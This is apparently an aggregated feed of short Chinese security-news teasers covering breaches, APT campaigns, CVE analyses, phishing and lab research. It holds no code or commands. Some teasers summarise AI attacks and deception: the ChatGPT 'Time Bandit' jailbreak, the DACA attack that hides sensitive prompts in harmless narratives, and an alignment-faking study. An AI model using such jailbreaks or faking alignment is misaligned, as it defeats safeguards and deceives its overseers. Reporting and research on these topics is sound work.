思路 渗透测试中,必须使用代理服务器,所以首先假设我们有一台具有公网IP的服务器,作为攻击机. 内网是相对的,有时进入DMZ区,发现要使用VPN进入目标网段. 在这里讨论只一台受害主机的攻击路径,认为是最小元,需要得出一个方法论,这个方法论将适
Source: Gorgias
思路 渗透测试中,必须使用代理服务器,所以首先假设我们有一台具有公网IP的服务器,作为攻击机. 内网是相对的,有时进入DMZ区,发现要使用VPN进入目标网段. 在这里讨论只一台受害主机的攻击路径,认为是最小元,需要得出一个方法论,这个方法论将适
Source: Gorgias
CCF-腾讯犀牛鸟基金(以下简称犀牛鸟基金)于2013年由腾讯公司和中国计算机学会(CCF)共同发起,致力于面向海内外青年学者搭建产学研合作及学术交流的平台. 9年来,犀牛鸟基金为全球范围内最具创新力的青年学者提供了解产业真实问题,接触业务实际需求的机会,并通过连接青年学者与企业研发团队的产学科研合作,推动双方学术影响力的提升及研究成果的应用落地,为自主研发技术的探索和创新储备能量
Source: 腾讯科恩实验室官方博客
Meta确认WhatsApp遭零点击间谍软件攻击,90名记者和活动家被入侵,攻击者使用Paragon间谍软件,Meta已采取法律行动
Source: FreeBuf互联网安全新媒体平台
虚假谷歌广告瞄准微软广告账户,窃取登录凭证和2FA代码,攻击者利用钓鱼页面伪装微软官网,大规模劫持用户账户
Source: FreeBuf互联网安全新媒体平台
社交工程攻击长期以来一直是一种有效的策略,因为它专注于利用人类的弱点. 它不需要暴力破解密码,也不需要寻找未修补的软件漏洞. 相反,它只是通过操纵信任、恐惧和对权威的尊重等情感,来获取敏感信息或访问受保护的系统
Source: FreeBuf互联网安全新媒体平台
意大利数据保护局封禁DeepSeek AI平台,指责其用户数据处理缺乏透明度,并启动调查. 公司回应称不在意大利运营,监管机构紧急限制其数据处理活动
Source: FreeBuf互联网安全新媒体平台
最近和朋友在讨论SIEM的告警优化,结合工作经验,写了这篇文章,希望读完本文能打开你的思维
Source: FreeBuf互联网安全新媒体平台
近日,备受瞩目的中国人工智能初创公司深度搜索(DeepSeek)因数据库暴露在互联网上而引发关注,此举可能导致恶意攻击者获取敏感数据. 据Wiz安全研究员Gal Nagli透露,暴露的ClickHouse数据库“允许对数据库操作进行全面控制,包括访问内部数据的能力”. 此次泄露事件涉及超过一百万条日志流,包含聊天记录、密钥、后端细节以及其他高度敏感信息,如API密钥和操作元数据
Source: FreeBuf互联网安全新媒体平台
一种名为Browser Syncjacking的新型攻击方式,展示了如何利用看似无害的Chrome扩展程序来接管受害者的设备
Source: FreeBuf互联网安全新媒体平台
一种名为“时间强盗”的ChatGPT漏洞绕过安全防护,允许用户获取武器制造、核话题和恶意软件创建等敏感信息,引发严重安全担忧
Source: FreeBuf互联网安全新媒体平台
靶机IP:10. 129. 166
Source: FreeBuf互联网安全新媒体平台
绕过正则表达模式匹配器
Source: FreeBuf互联网安全新媒体平台
勒索软件通过隐秘SSH隧道攻击ESXi系统,利用其作为C2通信通道,逃避检测并建立持久性后门,威胁企业网络安全
Source: FreeBuf互联网安全新媒体平台
#JS混淆解密 #API-RCE #OverlayFS权限提升
Source: FreeBuf互联网安全新媒体平台
本周聚焦AI驱动的威胁、医疗技术漏洞及法规更新,揭露Juniper路由器攻击、Mirai僵尸网络破纪录DDoS攻击等重大安全事件,警示企业加强防护
Source: FreeBuf互联网安全新媒体平台
DeepSeek遭遇大规模网络攻击,暂停新用户注册. 现有用户仍可登录,但平台面临严峻网络安全挑战,凸显快速增长的AI平台易受攻击的风险
Source: FreeBuf互联网安全新媒体平台
错误配置下shiro没有做出相应“正确”的行为,导致路径匹配绕过
Source: FreeBuf互联网安全新媒体平台
GamaCopy模仿Gamaredon战术,针对俄罗斯实体展开网络间谍活动,利用UltraVNC远程控制主机,威胁国家安全
Source: FreeBuf互联网安全新媒体平台
新威胁组织GamaCopy模仿俄罗斯Gamaredon APT,针对俄语目标发起攻击,使用军事诱饵文档和UltraVNC进行远程控制,欺骗安全厂商,威胁俄罗斯国防和基础设施领域
Source: FreeBuf互联网安全新媒体平台
近期,火绒工程师在日常病毒分析过程中发现一个特殊的白加黑样本,其中的黑 DLL 带有驱动人生数字签名
Source: FreeBuf互联网安全新媒体平台
作者:Mohammad Wali Ur Rahman等 译者:知道创宇404实验室翻译组 原文链接:https://arxiv. org/html/2501. 10627v1 摘要: IPv6 扩展头的灵活性和复杂性使得攻击者能够创建隐秘通道或绕过安全机制,从而导致潜在的数据泄露或系统被入侵
Source: Seebug Paper
作者:知道创宇404实验室 2024年,网络安全领域接连曝出了一系列高危漏洞,这些漏洞不仅影响范围广泛,而且破坏力极大,对全球的网络安全构成了严峻挑战. 以下是我们从今年的安全漏洞应急中总结出的一些颇具危害性和影响力的网络安全漏洞,排名不分先后,当然,我们也从Seebug漏洞平台访问数据和ZoomEye网络空间搜索引擎对应搜索出来的受影响量级中筛选出了排名相对靠前的漏洞,附在文末供大家参考. 通
Source: Seebug Paper
Author:Knownsec 404 Advanced Threat Intelligence team Date: January 21, 2025 中文版:https://paper. seebug. org/3269 Recently, our team discovered attack samples targeting Russian-speaking targets during
Source: Seebug Paper
作者:知道创宇404高级威胁情报团队 英文版:https://paper. seebug. org/3270 近期,团队在威胁狩猎过程中,发现了针对俄语区目标的攻击样本
Source: Seebug Paper
作者:Brandon J Walton, Mst Eshita Khatun, James M Ghawaly, Aisha Ali-Gombe. 译者:知道创宇404实验室翻译组 原文链接:https://arxiv. org/abs/2501
Source: Seebug Paper
作者:canyie 原文链接:https://blog. canyie. top/2024/11/07/self-changing-data-type/ 今年 10 月份的时候,Android 安全公告用 CVE-2024-40676 的编号公布了一个很奇怪的 patch
Source: Seebug Paper
作者:Nicolas Grislain 译者:知道创宇404实验室翻译组 原文链接:https://arxiv. org/html/2412. 19291v1#Sx4 摘要 检索增强生成(Retrieval-Augmented Generation, RAG)已成为为大型语言模型(Large Language Models, LLM)提供最新且相关上下文的主流技术
Source: Seebug Paper
作者:华为安全应急响应中心 原文链接:https://mp. weixin. qq
Source: Seebug Paper
作者:Trevor Dunlap, John Speed Meyers, Bradley Reaves, and William Enck. 译者:知道创宇404实验室翻译组 原文链接:https://www. enck
Source: Seebug Paper
作者:Reborn, Lisa@慢雾安全团队 原文链接:https://mp. weixin. qq
Source: Seebug Paper
作者:简单的机器学习 原文链接:https://mp. weixin. qq
Source: Seebug Paper
作者:Pedro Umbelino, Jake Olcott 译者:知道创宇404实验室翻译组 原文链接:https://www. bitsight. com/blog/aftermath-kaspersky-ban 在2024年春,全球对供应链风险的担忧日益加剧,对技术供应商的信任和可靠性问题也愈发凸显
Source: Seebug Paper
作者:启明星辰ADLab 原文链接:https://mp. weixin. qq
Source: Seebug Paper
作者:Ryan Greenblatt, Carson Denison等 译者:知道创宇404实验室翻译组 原文链接:https://arxiv. org/abs/2412. 14093v1 摘要 我们在此呈现了一项关于大型语言模型在训练过程中进行“对齐伪装”行为的演示:该模型有选择地遵从其训练目标,以防止其行为在训练之外被改变
Source: Seebug Paper
作者:Portia Cooper, Harshita Narnoli, Mihai Surdeanu 译者:知道创宇404实验室翻译组 原文链接:https://arxiv. org/pdf/2412. 12212 摘要 文本到图像模型常常遭受一种称为“分而治之攻击”(DACA)的逐步攻击,该攻击通过大型语言模型将敏感文本包装在看似无害的叙述中,以隐藏不当内容
Source: Seebug Paper
黑客分子利用伪造的恶意软件构建器以被称为 “script kiddies(脚本小子)” 的低技能黑客为目标,通过后门秘密感染他们,以窃取数据并接管其计算机. CloudSEK 的安全研究人员报告称,该恶意软件感染了全球 18,459 台设备,其中大部分位于俄罗斯、美国、印度、乌克兰和土耳其. CloudSEK 报告中写道:“XWorm RAT 构建器的木马版本已被武器化并传播
Source: 嘶吼
点击劫持攻击的一种新变体称为“DoubleClickjacking”,攻击者可以诱骗用户使用双击授权敏感操作,同时绕过针对此类攻击的现有保护措施. 点击劫持,是指威胁者创建恶意网页,诱骗访问者点击隐藏或伪装的网页元素. 这些攻击的工作原理是将隐藏 iframe 中的合法网页覆盖在攻击者创建的网页上
Source: 嘶吼
1月7日,西藏自治区日喀则市定日县突发6. 8级地震,造成重大人员伤亡,大量房屋倒塌. 在全国人民都心系灾区、为受灾同胞忧虑之际,一张“小孩被埋图”引发关注,让人揪心不已
Source: 嘶吼
近日,中共中央办公厅、国务院办公厅印发《关于推进新型城市基础设施建设打造韧性城市的意见》(以下简称《意见》),旨在深化城市安全韧性提升行动,推进数字化、网络化、智能化新型城市基础设施建设,打造承受适应能力强、恢复速度快的韧性城市,增强城市风险防控和治理能力. 城市作为人类社会发展的重要载体,承载着大量的人口、资源和经济活动. 然而,随着城市化步伐的加快,城市面临着自然灾害,公共卫生、社会安全事件等多重日益复杂的安全挑战,其安全韧性直接影响到国家安全和人民福祉,成为保障城市可持续发展和人民生命财产安全的关键
Source: 嘶吼
2025年1月23日,Coremail CACTER邮件安全联合北京中睿天下信息技术有限公司发布《2024年第四季度企业邮箱安全性研究报告》. 2024年Q4,企业邮箱面临的安全威胁形势严峻且复杂. 垃圾邮件、钓鱼邮件攻击频发,暴力破解态势也呈现出新的特点
Source: 嘶吼
即使安全启动保护处于活动状态,也可能会利用一个新的 UEFI 安全启动绕过漏洞(编号为 CVE-2024-7344)影响 Microsoft 签名的应用程序来部署 bootkit,多个第三方软件开发商的多个实时系统恢复工具中存在易受攻击的 UEFI 应用程序. Bootkit 是一种难以检测的严重安全威胁,因为它们在操作系统加载之前采取行动,并且在操作系统重新安装后仍然存在. 根本问题该问题源于使用自定义 PE 加载程序的应用程序,该加载程序允许加载任何 UEFI 二进制文件,即使它们未签名
Source: 嘶吼
有关针对 Chrome 浏览器扩展程序开发人员的网络钓鱼活动的新细节近期被披露,该活动导致至少 35 个扩展程序被入侵,以注入数据窃取代码,其中包括来自网络安全公司 Cyberhaven 的扩展程序. 尽管最初的报告主要集中在 Cyberhaven 的安全扩展上,但随后的调查显示,相同的代码已被注入到至少 35 个扩展中,总共约有 2,600,000 人使用. 从目标开发者对 LinkedIn 和 Google Groups 的报告来看,最新的攻击活动于 2024 年 12 月 5 日左右开始
Source: 嘶吼
黑客正在积极利用 Cleo 托管文件传输软件中的零日漏洞来破坏企业网络并进行数据盗窃攻击. 该漏洞存在于该公司的安全文件传输产品 Cleo LexiCom、VLTrader 和 Harmony 中,允许不受限制的文件上传和下载,从而导致远程代码执行. Cleo MFT 漏洞影响版本 5
Source: 嘶吼
2024年,人工智能产业在国家与中央层面的高度重视下蓬勃发展,政策引领路径清晰,技术创新不断突破,产业态势越发活跃. 国家战略明确将人工智能作为重点发展领域,通过“人工智能+”战略行动推动其与各行各业的深度融合. 国资委专题会议强调,中央企业要把发展人工智能放在全局工作中统筹谋划,深入推进产业焕新,加快布局和发展人工智能产业
Source: 嘶吼
近日,福建省科技厅、工信厅、商务厅联合发布了《福建省科学技术厅等三部门关于印发数字赋能促进县域重点产业链创新发展典型案例的通知》[闽科服(2025)1号]文件,将武平新显产业大脑平台列为典型案例,印发各地学习借鉴. 此份荣誉不仅彰显了武平县在推进全省数字化转型升级进程中的卓越贡献,同时也是对国投智能运用数字技术赋能县域产业发展的高度认可,更是国投智能响应国投集团号召,持续推动“数字科技赋能乡村振兴”专项工作的重要成果. 与此同时,福建省数据管理局也于近日公布了“2024年度全省公共数据应用优秀案例”,由国投智能承建的武平新显产业大脑平台历经“申报推荐、资格初筛、现场答辩、专家评审”等环节,脱颖而出成功入选,成为龙岩市唯一获评项目
Source: 嘶吼
5分钟生成一篇结课论文、10分钟做完一个PPT报告、上交的作业充满AI味儿,老师头疼不已……近日,复旦大学正式发布《复旦大学关于在本科毕业论文(设计)中使用AI工具的规定(试行)》(以下简称《规定》),对本科生在毕业论文中使用AI工具提出了严格限制,这一新闻热点事件引发了社会各界的广泛关注. 《规定》明确提出了“六个禁止”,其中包括禁止在研究设计与数据分析、原始数据收集、结果图片与重要插图创作等过程中使用AI工具. 这一禁令的出台,旨在防止学生过度依赖AI工具,损害其创造力和表达能力
Source: 嘶吼
时光匆匆,2024年的篇章已然落下帷幕. 过去这一年,广东盈世计算机科技有限公司旗下品牌CACTER在邮件安全技术创新与发展上取得显著成就. 2024年,我们从国家级认证到行业评选,凭借技术实力和市场表现,获得了多项荣誉,凝聚了团队的智慧与努力,也得到了行业与客户的认可与信任
Source: 嘶吼
Otelier(以前称为 MyDigitalOffice)是一种基于云的酒店管理解决方案,全球 10,000 多家酒店使用它来管理预订、交易、夜间报告和发票. 该公司被许多知名酒店品牌使用,其中包括万豪、希尔顿和凯悦. 近期,酒店管理平台 Otelier 遭遇数据泄露,黑客入侵了其 Amazon S3 云存储,窃取了数百万客人的个人信息以及万豪、希尔顿和凯悦等知名酒店品牌的预订信息
Source: 嘶吼
回望2024年,国投智能积极响应国家战略,在数字政务业务领域守正创新,持续突破,以科技创新为引擎,驱动数字政务向更高效、更便捷、更智能的方向迈进. 本期专题让我们共同回顾. “智慧安防多面开花”1 推出创新产品边缘智慧小站系列产品推出包含“图数融合”边缘智慧小站等系列产品,基于自主可控的智能视觉微服务器,打造功能强大、性价比高、部署灵活的边缘分析应用盒子,同时通过智能化技术与多领域交叉融合,创新安防服务模式,适应多元化的应用场景,从而满足现代社会不断变化的安防需求
Source: 嘶吼
2025年1月 – 网络安全解决方案先驱者和全球领导者 Check Point 软件技术有限公司(纳斯达克股票代码:CHKP)今日发布了其年度报告《2025 年全球网络安全现状》,揭示全球网络攻击次数同比骤增 44%. 该报告不仅揭示了新的网络趋势和新型攻击手段,而且还为首席信息安全官提供了如何应对这一持续变化形势的实用指南. Check Point 软件技术公司研究副总裁 Maya Horowitz 表示:“2025 年的网络安全防护不仅仅要保护网络,还要维护用户对我们的系统和企业的信任
Source: 嘶吼
Check Point 软件技术公司的最新威胁指数报告揭示了基于 AI 的勒索软件团伙 FunkSec 风头渐起,FakeUpdates 和 AgentTesla 威胁持续存在,网络犯罪手段在不断演进. 2025 年 1 月 – 网络安全解决方案先驱者和全球领导者 Check Point® 软件技术有限公司(纳斯达克股票代码:CHKP)发布了其 2024 年 12 月《全球威胁指数》报告,强调网络犯罪分子不断进行技术迭代. 本月,利用人工智能 (AI) 的新兴勒索软件即服务 (RaaS) 运营组织 FunkSec 风头渐起,FakeUpdates 和 AgentTesla 等恶意软件家族威胁持续存在
Source: 嘶吼
自 2024 年底起,IoT 僵尸网络的 C&C 服务器便开始向日本及其他国家和地区发送大规模 DDoS 攻击命令. 这些命令的目标涵盖了多家公司,其中不乏日本的大型企业与银行. 尽管目前无法确认直接联系,但一些目标组织反馈,在此期间出现了临时连接异常和网络中断的情况,而这些状况与观察到的攻击命令高度吻合
Source: 嘶吼
1月20日,绿盟科技发布2024年度业绩预告,预计2024年度公司实现营业收入22. 60亿元至24. 60亿元,较上年同期增长34
Source: 嘶吼
前言 首先声明此漏洞很老,修复的话只需升级到M7. 5版本,前段时间无意间看到安全群有人聊到绕深信服SSL VPN的ACL,一直想实践一下,后来再网上只找到了这一篇两年前的参考资料<a href="https://www. secpulse
Source: Gorgias
在数字经济蓬勃发展的今天,用户的个人信息保护已成为社会各界广泛关注的焦点,反映出人们对隐私安全的重视日益增强. 随着互联网技术的进步,用户在享受便利的同时,个人隐私泄露和个人信息滥用等问题也愈发突出. 《个人信息保护法》规定,企业在进行收集、存储和使用等一系列个人信息处理活动时,必须遵循透明性、合法性和必要性原则
Source: 嘶吼
Author: Guannan Wang, Guancheng Li of Tencent Security Xuanwu Lab 0x00 背景企业为防御网络攻击,常常投资于先进的安全产品,如EDR、NDR、WAF等,这些产品往往依靠特定的规则生成告警,提示企业可能存在的网络威胁. 但这些告警规则因为缺乏网络安全领域的先验知识,为企业的安全防御带来了双重挑战: 只依赖具体的规则进行检测会产生大量误报,导致企业难以分辨哪些是检测到真正网络威胁的告警; 用户对告警的理解和反应受限于他们在安全领域的知识水平,这对用户的能力提出了较高的要求. 因此,告警的解读和响应通常需要有丰富安全知识和经验的安全专家与企业的运营团队进行紧密合作才能完成
Source: 腾讯玄武实验室
Author : Yu Chen(alohachen) of Tencent Security Xuanwu Lab 0x00 简介随着LLM应用的广泛普及,用户对提示词中的隐私信息泄漏的担忧日益增加. 我们首次提出了一种可部署在端侧的提示词隐私保护方案,并对其安全性和可用性进行了评估. 与安全多方计算(MPC)和Presidio等方案相比,我们的方案具有轻量化、端到端,支持匿名信息还原等优点
Source: 腾讯玄武实验室
Windows打印机相关服务存在逻辑缺陷,可以被用来进行权限提升甚至可以实现远程任意代码执行,微软已于2021年6月8号发布安全补丁,对该缺陷进行修复,请尽快完成系统更新
Source: 腾讯玄武实验室
Author: Xiangqian Zhang, Huiming Liu of Tencent Security Xuanwu Lab 0x00 简介本文我们将详细介绍对Android手机厂商自带的隐私保护应用程序的研究. 我们调查了排名前五的Android供应商提供的隐私保护应用程序,发现许多应用程序并不能很好地保护我们的隐私安全. 我们针对隐私保护应用提出了3种威胁模型,并展示了4个隐私保护应用的攻击案例
Source: 腾讯玄武实验室
作者:腾讯安全玄武实验室 dlive, salt 0x00 背景简介CDN(Content Delivery Network) 是云服务厂商提供的一种Web内容加速分发服务. 对于攻击者来说,CDN提供了大量分布于全球各地的边缘节点IP,并且可以将源服务器隐藏在CDN节点之后,所以CDN非常适合被用于保护C2的通信. 本文介绍了我们在某些CDN实现中发现的一些特性,以及如何利用这些特性隐藏C2通信流量,我们将这种新型的基于CDN的隐蔽通信方法称为Domain Borrowing
Source: 腾讯玄武实验室
问题简介腾讯安全玄武实验室在部分快速充电(以下简称快充)产品中发现了一种新型安全问题,并将其命名为“BadPower”. 利用BadPower,攻击者可入侵支持快充技术的充电器等设备,使被入侵的设备在对外供电时输出过高电压,从而导致受电设备的元器件击穿、烧毁, 甚至可能进一步对受电设备所在物理环境产生安全隐患
Source: 腾讯玄武实验室
Apache Shiro是一个强大且易用的Java安全框架,它可以用来执行身份验证、授权、密码和会话管理. 目前常见集成于各种应用中进行身份验证,授权等. 漏洞详情腾讯安全玄武实验室研究员发现在Apache Shiro 1
Source: 腾讯玄武实验室
Apache Dubbo是一种基于Java的高性能RPC框架. 该项目于2011年开源,并于2018年2月进入Apache孵化器,目前已经成为了广大开发者最常使用的微服务框架之一. 它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现
Source: 腾讯玄武实验室
本文详细分析了 Adobe Acrobat Reader / Pro DC 中近期修复的安全漏洞 CVE-2019-8014. 有趣的是,Adobe 在六年前修复了一个类似的漏洞 CVE-2013-2729 ,正是由于对该漏洞的修复不够完善,才使得 CVE-2019-8014 遗留了长达六年之久. 本文同时讨论了如何为此类漏洞编写利用代码
Source: 腾讯玄武实验室
作者:腾讯安全玄武实验室 tomato, salt 0x00 背景Ghidra是 NSA 发布的一款反汇编工具,它的发布引起了安全研究人员的极大兴趣. 有研究人员发现Ghidra在加载工程时会存在XXE,基于笔者之前对XXE漏洞利用研究发现,攻击者可以利用Java中的特性以及Windows操作系统中NTLM认证协议的缺陷的组合来完成RCE
Source: 腾讯玄武实验室
作者:lywang, dannywei 0x00 背景WinRAR 作为最流行的解压缩软件,支持多种压缩格式的压缩和解压缩功能. 今天,Check Point公司的安全研究员 Nadav Grossman 公开了他在 WinRAR 中发现的一系列漏洞. 其中以 ACE 解压缩模块的远程代码执行漏洞(CVE-2018-20250)最具危害力
Source: 腾讯玄武实验室
Author : Kai Song(exp-sky)、hearmen、salt、sekaiwu of Tencent Security Xuanwu Lab “盗币”十一月六日,我们观察到以太坊上出现了这样一份合约,经调查发现是某区块链安全厂商发布的一份让大家来“盗币”的合约
Source: 腾讯玄武实验室
玄武实验室联合独立安全研究员 em 发现在 Mac OS 上用户量比较大的两款微信防撤回外挂存在安全问题,装了此外挂的用户只要在浏览器里访问攻击者页面并停留一分钟左右,攻击者即可拿到该用户的好友列表,聊天记录,甚至以该用户的身份给好友发送消息,对用户的信息安全造成巨大威胁
Source: 腾讯玄武实验室
TL;DRPHP开发者以及一些安全研究人员经常会在本地搭建一个基于Xdebug的PHP的调试服务,在大部分配置情况下,Xdebug采用HTTP请求头中的X-Forwarded-For字段作为DBGp协议的回连地址. 受害者浏览攻击页面一段时间,攻击者可利用DNS Rebind技术向本地服务器发送带有恶意X-Forwarded-For的请求,即有可能在受害者电脑上执行任意代码
Source: 腾讯玄武实验室
2017年11月27日Check Point 公司报告了一个华为 HG532 系列路由器的远程命令执行漏洞,漏洞编号为CVE-2017-17215. 利用该漏洞,向路由器UPnP服务监听的37215端口发送一个特殊构造的 HTTP 请求包,即可触发命令执行. 此端口在默认配置下并不能从外网访问,但由于该系列路由器数量极其巨大,所以互联网上仍有较多可访问到该端口的设备存在
Source: 腾讯玄武实验室
Browser UI ,是指浏览器用户界面. 浏览器经过几十年的发展,对于用户界面并没有一个统一的规定标准,目前大多数现代浏览器的用户界面包括:前进和后退按钮、刷新和停止加载按钮、地址栏、状态栏、页面显示窗口、查看源代码窗口、标签等. 另外可能还会有一些其他的用户界面,例如下载管理、页面查找、通知、系统选项管理、隐身窗口等等
Source: 腾讯玄武实验室
背景笔者在2016年11月发现并报告了HP Support Assistant (HPSA) 的权限提升漏洞,HP Product Security Response Team (HP PSRT) 响应迅速,但却以此漏洞可以通过软件的自动更新功能自动修复为由拒绝为其发布安全公告和CVE. 4月份想起这件事后,笔者又分析了一遍修补后的HPSA,发现HP的开发人员在修补中犯了更为低级的错误,导致补丁可以被绕过重新实现权限提升. 在随后与HP PSRT的沟通与合作中,再一次利用其它技巧绕过了其后续修补,最终笔者协助HP PSRT完成了漏洞的修补
Source: 腾讯玄武实验室
Author: Ke Liu of Tencent’s Xuanwu Lab 1. 漏洞简介1. 1 漏洞简介2017年3月27日,来自华南理工大学的 Zhiniang Peng 和 Chen Wu 在 GitHub [1] 上公开了一份 IIS 6
Source: 腾讯玄武实验室
0x00 前言每一个安全初学者都喜欢问这样一个问题,“我应该做web安全还是做二进制安全,哪个更有意思. 哪个更有钱途. ” 二进制安全就只等于反汇编,逆向,调试,内核 ……
Source: 腾讯玄武实验室
Bookmarklet,中文名可以翻译成小书签,它的存在形式和书签一样,都被保存在浏览器的收藏夹中. 但它不是一个 HTTP、FTP、File 开头的 URL,而是一段 javascript: 开头的 javascript 代码. 1995 年 Javascript 的作者 Brendan Eich 特意设计 javascript: URLs 和普通URL一样用于收藏夹,时至今日小书签已经于浏览器中存在了 20多年
Source: 腾讯玄武实验室
顶会rebuttal技术浅谈 by ourrenDeepSeek写流量安全分析研判工具 by ourren更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
今日暂未更新资讯~更多最新文章,请访问SecWiki
Source: SecWiki News(国内外安全资讯)
作者:answerboy@知道创宇404积极防御实验室时间:2020年9月18日 1. 概述 专项行动期间,某天 […]
Source: 知道创宇
作者:Kerne7@知道创宇404实验室时间:2020年9月28日 前言 选择这个漏洞的原因是和之前那个cve […]
Source: 知道创宇
作者:知道创宇404实验室时间:2020年10月26日 “404星链计划”是知道创宇404实验室于2020年8 […]
Source: 知道创宇
作者:HuanGMz@知道创宇404实验室时间:2020年10月30日. NET 相关漏洞中,ViewStat […]
Source: 知道创宇
作者:LoRexxar'@知道创宇404实验室时间:2020年10月30日 前言 前段时间开源新版本KunLu […]
Source: 知道创宇
作者:昏鸦@知道创宇404区块链安全研究团队时间:2020年9月14日 发生了什么 iToken是bZx推出的 […]
Source: 知道创宇
作者:昏鸦,Al1ex@知道创宇404区块链安全研究团队时间:2020年9月16日 事件起因 2020年9月1 […]
Source: 知道创宇
作者:知道创宇404实验室时间:2020年9月21日 “404星链计划”是知道创宇404实验室于2020年8月 […]
Source: 知道创宇
作者:LoRexxar'@知道创宇404实验室时间:2020年9月21日英文版:https://paper. s […]
Source: 知道创宇
作者:Longofo@知道创宇404实验室 & r00t4dm@奇安信A-TEAM时间:2020年9月 […]
Source: 知道创宇
本文链接 钓鱼邮件种类 钓鱼邮件写法 如何成功制作一封钓鱼邮件
Source: 信息安全知识库
本文链接 第一部分 网络安全与中国黑客成长简史 第二部分 攻防两端对抗技术演进简史 第三部分 网络攻端人才的未来
Source: 信息安全知识库
本文链接 AI在网络安全的应用 AI模型安全与隐私 针对AI赋能安全的攻击 AI时代网络空间安全新挑战
Source: 信息安全知识库
本文链接 个人介绍 前置知识 域与域之间的横向移动 绕过SID过滤
Source: 信息安全知识库
本文链接链上洗钱与反洗钱 重要性: 利用加密货币进行洗钱的增长趋势明显, 反洗钱是阻止黑客获取收益,追回损失的最后一道防线
Source: 信息安全知识库
本文链接 Audit Spring Framework & Spring Boot Hacked Spring
Source: 信息安全知识库
本文链接 安卓应用的防护手段 iOS应用的防护手段 同应用防护力度对比 r0cap/r0tracer支持iOS
Source: 信息安全知识库
本文链接 个人介绍 Exchange架构 CVE-2020-0688 ProxyLogon ProxyShell 总结
Source: 信息安全知识库
本文链接 电诈团伙产业链条演变 裸聊诈骗的套路解密 裸聊诈骗的幕后技术 深入电诈团伙内网探测 对团伙内网管理软件的突破
Source: 信息安全知识库
本文链接不同运营商使用相同固件会存在同一类型漏洞 供应链中引入的代码可能永远不会得到审查 介绍 安全漏洞 研究&漏洞 总结
Source: 信息安全知识库
值蛇年春节到来之际,我们精选过去一年公众号30多篇技术文章和科研论文,整理制作成一本600多页的电子书,作为一份特别的新年礼物,献给每一位热爱技术的你. 愿大家乘风破浪,勇往直前
Source: 美团技术团队
本文对鸿蒙公开资料进行了深入分析和解读,梳理了鸿蒙单框架应用的签名机制,拆解每一步的实操过程和背后的实现原理,并对源码分析整理签名的校验机制. 从中管中窥豹,探究鸿蒙系统的安全设计思路,希望能给从事鸿蒙研发的同学提供一些借鉴
Source: 美团技术团队
本文整理了2024年美团技术团队最为热门的10篇技术文章,这些文章覆盖了基础理论、数据存储、因果推断、搜索推荐、智能测试、知识图谱、领域驱动设计等多个技术领域,期望这些精选内容能为大家带来一些启发或帮助. 愿大家在新的一年里,持续深耕技术沃土,稳步前行,不断攀登新的高峰
Source: 美团技术团队
美团到店研发平台质量工程部与复旦大学计算机学院周扬帆教授团队展开了大前端智能化测试领域的科研合作,从UI界面内容一致性校验入手,并实现了一套自动化智能检测流程,相关论文被软件工程领域具有国际影响力的会议ICSE 2024(CCF-A类会议)的Software In Practice Track(软件工程实践应用)收录
Source: 美团技术团队
本文精选了美团技术团队被 CIKM 2024 收录的 8 篇论文进行解读,覆盖了自监督学习、解释生成、CTR预测、跨域推荐、向量召回、图像生成、时效预测等多个技术领域. 这些论文有美团独立研究,还有跟高校、科研机构合作的成果. 希望能给从事相关研究工作的同学带来一些帮助或启发
Source: 美团技术团队
长久以来,容器要实现动态化和双端复用,难免要牺牲掉一些性能. 有没有办法让动态化容器的性能尽可能接近原生. 美团金服大前端团队给出了一种解决方案,尝试突破动态化容器的天花板
Source: 美团技术团队
本文详述了全域建模技术在美团首页推荐系统的发展和演进. 美团首页推荐算法团队通过多阶段递进式探索验证,在召回与排序模块引入多展位、多应用渠道的多源用户交互数据,并在落地过程中解决了美团多展位、多业务、时空场景强相关性的特点导致的严重跨域信号负迁移挑战
Source: 美团技术团队
大众点评技术部/搜索与内容智能团队组成的BlackPearl队伍,参加了2024年KDD 2024 OAG-Challenge Cup赛道的WhoIsWho-IND、PST、AQA三道赛题,以较大优势包揽了该赛道全部赛题的冠军,本文对这三个赛道的夺冠方案分别进行了解读,希望对大家有所帮助或启发
Source: 美团技术团队
本文介绍了美团履约技术平台的新一代实验分析引擎,该引擎对核心实验框架进行了标准化,并融合了众多先进解决方案,有效解决小样本挑战. 同时,提供了多样化的溢出效应应对策略,并针对不同业务场景提供了精准的方差和P值计算方法,以规避统计误差. 希望对大家有所帮助或启发
Source: 美团技术团队
本文整理自美团技术沙龙第81期《美团在广告算法领域的探索及实践》(B站视频). 文章首先介绍了美团信息流广告业务以及预估技术的现状,然后重点分享了信息流广告预估在美团的具体实践,围绕决策路径、超长超宽建模和全还原建模等多个维度进行了分享,最后是一些总结和展望,希望能对大家有所帮助或启发
Source: 美团技术团队
新闻速览 美国希望拥有TikTok 50%股份,商务部回应 ChatGPT又全球大面积宕机,AI助手暂时 […]
Source: 安全牛
当前,AI技术与安全运营的融合已成为行业趋势. 根据 Gartner 预测,到 2030 年,75%的SOC团队 […]
Source: 安全牛
一、 前言 2024年,全球邮件安全形势依然严峻,邮件攻击领域已呈现出新的态势和特点. 网络攻击者不断 […]
Source: 安全牛
新闻速览 工信部提醒:防范Androxgh0st僵尸网络风险 BreachForums主犯面临重审, 曾获宽松 […]
Source: 安全牛
“3~4年内,除了体力活,AI几乎能完成所有脑力工作……”,这是马斯克在2025年CES大会上的惊人预言之一, […]
Source: 安全牛
2024年度十大事件 回望2024,这是一个挑战与机遇并存的年份,也是国投智能以科技创新为引擎,加速产业变革, […]
Source: 安全牛
近日,瑞星公司发布《2024年中国网络安全报告》,该报告综合瑞星“星核”平台的数据与资料,对恶意软件、恶意网址 […]
Source: 安全牛
1月7日,西藏自治区日喀则市定日县突发6. 8级地震,造成重大人员伤亡,大量房屋倒塌. 在全国人民都心系灾区、为受 […]
Source: 安全牛
